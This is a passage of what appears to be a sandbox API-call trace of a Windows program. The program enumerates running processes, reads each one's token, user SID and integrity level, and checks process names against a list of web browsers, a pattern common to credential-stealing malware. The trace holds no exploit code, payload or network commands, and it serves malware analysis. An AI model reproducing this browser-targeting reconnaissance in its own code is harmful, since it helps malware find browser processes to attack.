TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.793] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.793] CloseHandle (hObject=0x590) returned 1 [0224.793] CloseHandle (hObject=0x584) returned 1 [0224.793] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0224.793] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e97e0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.793] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.793] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.794] GetLastError () returned 0x7a [0224.794] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.794] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.794] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.794] CloseHandle (hObject=0x590) returned 1 [0224.794] CloseHandle (hObject=0x584) returned 1 [0224.794] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0224.794] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0224.794] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0224.795] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0224.795] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0224.795] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0224.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0224.795] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.795] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.795] GetLastError () returned 0x7a [0224.795] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.795] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.795] CloseHandle (hObject=0x590) returned 1 [0224.796] CloseHandle (hObject=0x584) returned 1 [0224.796] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0224.796] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e5d08, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.796] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.796] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.796] GetLastError () returned 0x7a [0224.796] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.796] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.797] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.797] CloseHandle (hObject=0x590) returned 1 [0224.797] CloseHandle (hObject=0x584) returned 1 [0224.797] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0224.797] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0224.797] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0224.797] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0224.797] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0224.797] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0224.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0224.798] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.798] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.798] GetLastError () returned 0x7a [0224.798] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.798] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.798] CloseHandle (hObject=0x590) returned 1 [0224.798] CloseHandle (hObject=0x584) returned 1 [0224.798] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0224.799] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e5ea0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.799] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.799] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.799] GetLastError () returned 0x7a [0224.799] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.799] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.799] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.799] CloseHandle (hObject=0x590) returned 1 [0224.799] CloseHandle (hObject=0x584) returned 1 [0224.800] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0224.800] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0224.800] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0224.800] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0224.800] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0224.800] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0224.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0224.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0224.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0224.800] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.800] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.801] GetLastError () returned 0x7a [0224.801] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.801] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.801] CloseHandle (hObject=0x590) returned 1 [0224.801] CloseHandle (hObject=0x584) returned 1 [0224.801] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0224.801] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e64e8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.801] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.802] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.802] GetLastError () returned 0x7a [0224.802] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.802] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.802] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.802] CloseHandle (hObject=0x590) returned 1 [0224.802] CloseHandle (hObject=0x584) returned 1 [0224.802] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0224.802] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0224.803] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0224.803] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0224.803] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0224.803] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0224.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0224.805] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.805] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.805] GetLastError () returned 0x7a [0224.805] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.805] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.805] CloseHandle (hObject=0x590) returned 1 [0224.805] CloseHandle (hObject=0x584) returned 1 [0224.805] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0224.806] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e69e0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.806] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.806] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.806] GetLastError () returned 0x7a [0224.806] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.806] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.806] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.806] CloseHandle (hObject=0x590) returned 1 [0224.806] CloseHandle (hObject=0x584) returned 1 [0224.807] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0224.807] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0224.807] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0224.807] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0224.807] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0224.807] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0224.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0224.807] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.807] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.807] GetLastError () returned 0x7a [0224.808] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.808] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.808] CloseHandle (hObject=0x590) returned 1 [0224.808] CloseHandle (hObject=0x584) returned 1 [0224.808] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0224.808] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6af8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.808] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.808] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.809] GetLastError () returned 0x7a [0224.809] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.809] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.809] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.809] CloseHandle (hObject=0x590) returned 1 [0224.809] CloseHandle (hObject=0x584) returned 1 [0224.809] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0224.809] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0224.809] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0224.810] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0224.810] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0224.810] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0224.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0224.810] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.810] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.810] GetLastError () returned 0x7a [0224.810] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.810] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.810] CloseHandle (hObject=0x590) returned 1 [0224.811] CloseHandle (hObject=0x584) returned 1 [0224.811] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0224.811] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6c10, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.811] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.811] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.811] GetLastError () returned 0x7a [0224.811] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.811] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.812] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.812] CloseHandle (hObject=0x590) returned 1 [0224.812] CloseHandle (hObject=0x584) returned 1 [0224.812] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0224.812] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0224.812] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0224.812] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0224.812] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0224.812] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0224.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0224.812] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.813] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.813] GetLastError () returned 0x7a [0224.813] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.813] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.813] CloseHandle (hObject=0x590) returned 1 [0224.813] CloseHandle (hObject=0x584) returned 1 [0224.813] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0224.814] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6d50, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.814] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.814] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, 